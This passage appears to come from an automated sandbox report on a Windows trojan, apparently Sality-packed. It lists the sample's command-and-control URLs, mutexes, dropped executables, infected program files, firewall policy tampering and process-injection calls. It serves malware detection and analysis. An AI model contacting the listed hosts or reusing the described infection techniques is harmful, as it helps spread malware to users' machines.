00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh7
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060&o
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060-
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060704hM
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540608oI
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060Nh
          Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060xoP
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://kukutrustnet888.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://kukutrustnet987.info/home.gif
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://pan.baidu.com/s/1qWKD5ve
Source: Amcache.hve.2.dr | String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.baanboard.comBrendon
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.careerdesk.org/images/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.develop.comDeepak
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.klkjwre9fqwieluoi.info/
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr | String found in binary or memory: http://www.spaceblue.comMathias
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.youku.com/playlist_show/id_25824322.html
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comrobat
Source: SciTE.exe.2.dr | String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr | String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: SciTE.exe.2.dr | Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_bae7b752-b
Source: Yara match | File source: 0.2.1.0.0.2.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary

Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPED | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: C:\iuepn.exe, type: DROPPED | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality Author: ditekSHen
Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR
Source: iuepn.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rksowY.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: winmefmb.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B69652
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B722A0
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B66A85
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B6076
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B6D00
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\rksowY.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
Source: MyProg.exe.2.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: 1.0.0.2.exe | Binary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: \StringFileInfo\%s\OriginalFilename vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: N/A%02X-%02X-%02X-%02X-%02X-%02Xwww.dywt.com.cnGlobalMemoryStatusExKernel32.dllx86 Family %s Model %s Stepping %s%08X-%08X-%08X-%08X\StringFileInfo\%s\Comments\StringFileInfo\%s\ProductVersion\StringFileInfo\%s\ProductName\StringFileInfo\%s\OriginalFilename\StringFileInfo\%s\LegalTrademarks\StringFileInfo\%s\LegalCopyright\StringFileInfo\%s\InternalName\StringFileInfo\%s\FileDescription\StringFileInfo\%s\CompanyName%s\StringFileInfo\%s\FileVersion040904E4000%x, \VarFileInfo\TranslationopenMicrosoft Internet Explorer vs 1.0.0.2.exe
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
Source: 1.0.0.2.exe | Binary or memory string: OriginalFilename_R2Launcher.exe@ vs 1.0.0.2.exe
Source: 1.0.0.2.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0.2.1.0.0.2.exe.111ff18.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2be2300.11.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2be25f4.12.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: 0.2.1.0.0.2.exe.10eb0bc.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe, type: DROPPED | Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: C:\iuepn.exe, type: DROPPED | Matched rule: INDICATOR_EXE_Packed_SimplePolyuser author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly user or Sality
Source: rksowY.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: iuepn.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rksowY.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: winmefmb.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: iuepn.exe.0.dr | Static PE information: Section .text
Source: winmefmb.exe.0.dr | Static PE information: Section .text
Source: rksowY.exe.0.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@5/15@10/5
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B6D2B0 CreateToolhelp32Snapshot,Process32First,Process32Next,CreateMutexA,FindCloseChangeNotification
Source: C:\Users\user\Desktop\1.0.0.2.exe | File created: C:\Users\user\Desktop\VF.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_928_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_780_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_560_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_788_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_996_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_652_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\services.exeM_632_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_868_
Source: C:\Users\user\Desktop\1.0.0.2.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
Source: C:\Users\user\Desktop\1.0.0.2.exe | File created: C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | File read: C:\Windows\system.ini
Source: C:\Users\user\Desktop\1.0.0.2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1.0.0.2.exe | Virustotal: Detection: 86%
Source: unknown | Process created: C:\Users\user\Desktop\1.0.0.2.exe "C:\Users\user\Desktop\1.0.0.2.exe"
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process created: C:\Users\user\AppData\Local\Temp\rksowY.exe C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: sfc.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: clinkapi.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\1.0.0.2.exe | File written: C:\Windows\system.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 1.0.0.2.exe | Static file information: File size 5242880 > 1048576
Source: 1.0.0.2.exe | Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x4cfc00
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

          Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Unpacked PE file: 2.2.rksowY.exe.5b0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Source: initial sample | Static PE information: section where entry point is pointing to: pu
Source: 1.0.0.2.exe | Static PE information: section name: pu
Source: VF.dll.0.dr | Static PE information: section name: UPX2
Source: rksowY.exe.0.dr | Static PE information: section name: .aspack
Source: rksowY.exe.0.dr | Static PE information: section name: .adata
Source: MyProg.exe.2.dr | Static PE information: section name: PELIB
Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR
Source: SciTE.exe.2.dr | Static PE information: section name: u
Source: Uninstall.exe.2.dr | Static PE information: section name: EpNuZ
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B73600 push eax; ret 0_2_02B7362E
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B6072E push eax; iretd 0_2_02B6072F
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B1638 push dword ptr [005B3084h]; ret 2_2_005B170E
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B2D9B push ecx; ret 2_2_005B2DAB
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B6014 push 005B14E1h; ret 2_2_005B6425
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B600A push ebp; ret 2_2_005B600D
Source: 1.0.0.2.exe | Static PE information: section name: .rsrc entropy: 7.617344200663995
Source: 1.0.0.2.exe | Static PE information: section name: pu entropy: 7.7594391065047255
Source: iuepn.exe.0.dr | Static PE information: section name: .text entropy: 7.988165420952291
Source: rksowY.exe.0.dr | Static PE information: section name: .text entropy: 7.81169422100848
Source: winmefmb.exe.0.dr | Static PE information: section name: .text entropy: 7.988165420952291
Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR entropy: 6.934800097867026
Source: SciTE.exe.2.dr | Static PE information: section name: u entropy: 6.934468071332093
Source: Uninstall.exe.2.dr | Static PE information: section name: EpNuZ entropy: 6.934379233926794
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

          Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | File created: C:\Users\user\AppData\Local\Temp\winmefmb.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | File created: C:\iuepn.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | File created: C:\Users\user\Desktop\VF.dll
Source: C:\Users\user\Desktop\1.0.0.2.exe | File created: C:\Users\user\AppData\Local\Temp\rksowY.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

          Hooking and other Techniques for Hiding and Protection

Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: KeServiceDescriptorTable
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 799
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
